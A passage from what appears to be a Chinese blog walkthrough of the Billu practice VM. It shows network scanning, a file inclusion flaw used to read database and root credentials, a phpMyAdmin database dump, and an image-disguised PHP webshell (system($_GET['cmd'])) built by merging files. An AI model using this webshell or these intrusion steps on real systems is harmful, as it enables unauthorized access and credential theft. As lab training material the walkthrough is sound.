当前位置: 首页 > news >正文

Billu靶场黑盒盲打——思路和详解

一、信息收集

1、探测内网主机IP可以使用各种扫描工具比如nmap,我这里用的是自己编写的。

nmap -n 192.168.12.0/24  #扫描IP,发现目标主机

2、先不着急,先收集一波它的端口(无果)

 nmap -n 192.168.12.136 -p 1-10000  #可以看到它只有22个80

3、进入web界面查看

不错,我也是海迷!这个界面说的sql注入,尝试一番后无果,果断跳过。继续收集信息。

4、扫描路径dirb

 http://192.168.12.136/in

路径中有phpinfo()

我们可以看到,有文件包含

http://192.168.12.136/test

这个界面存在文件包含

 利用这个漏洞读取一波文件

通过一波搜索找到  c.php  文件为它的数据库文件连接信息

使用文件包含来把c.php直接下载下来

代码如下

 直接登录phpmyadmin目录直接查看数据库

二、信息利用

1、获取了数据库账号和密码,直接登录phpmyadmin目录直接查看数据库数据

查找http://192.168.12.136/phpMyAdmin目录,在尝试几次后,人品爆发,找到了

http://192.168.12.136/phpmy/index.php 

 完成拖库!!

 进入界面

2、文件下载利用——默认的配置文config.inc.php,应该和phpMyAdmin/index.php在同一级目录下。尝试下载

config.inc.php的内容。说实话这个东西一般人也发现不了,而且配置信息也不会这样写。

通过这个账号密码可以直接登录root用户

3、上传图片马,上传图片马的时候一定要注意,

图片原始的内容!!!!

像图片中带有 <? 这种符号的会直接影响我们的php木马的结构,导致比如system和eval无法执行。

 ①木马内容:

#@#$

GIF89a


<?php system($_GET['cmd']); ?>


#@#$

②使用cmd与png进行合并:

                copy 111.png/b + 1.php/a 555.png

③上传图片,然后使用

4、直接使用sql语句来植入木马

        1、查看sql权限可以看到,允许任意文件读取和写入。

 

六、它还开启了22号端口,那么直接把它的/etc/passwd下载下来,进行尝试爆破(无果)

http://www.lryc.cn/news/23119.html

相关文章:

  • 【2363. 合并相似的物品】
  • 【C++提高编程】C++全栈体系(二十四)
  • c++11 标准模板(STL)(std::unordered_set)(十一)
  • AI/CV大厂笔试LeetCode高频考题之基础核心知识点
  • 华为OD机试题,用 Java 解【静态扫描最优成本】问题
  • 常见无线技术方案介绍
  • 收获满满的2022年
  • react的生命周期
  • scanpy 单细胞分析API接口使用案例
  • 【Vue3 第二十一章】Teleport组件传送
  • 在 Windows Subsystem for Linux (WSL2) 的 Ubuntu 系统上配置 Vulkan 开发环境
  • 放苹果HJ61
  • Windows下,OPC UA移植,open62541移植
  • 【Tomcat与Servlet篇1】认识Tomcat与Maven
  • C++类和对象:拷贝构造函数和运算符重载
  • 【IntelliJ IDEA】idea plugins搜索不出来,如何找到插件的解决方案
  • 移动端自动化测试(一)appium环境搭建
  • 5 逻辑回归及Python实现
  • 技术干货 | Modelica建模秘籍之状态变量
  • LeetCode 2574. 左右元素和的差值
  • rollup环境配置
  • 二分查找与二分答案、递推与递归、双指针、并查集和单调队列
  • 如何进行域名购买,获取免费ssl证书,使用springboot绑定ssl证书
  • LabVIEW网络服务安全2
  • java动态代理
  • Python 简单可变、复杂可变、简单不可变、复杂不可变类型的copy、deepcopy的行为
  • QML Item
  • 使用xca工具生成自签证书
  • Unity IOS 通过命令行导出IPA
  • 「架构」全链路异步模式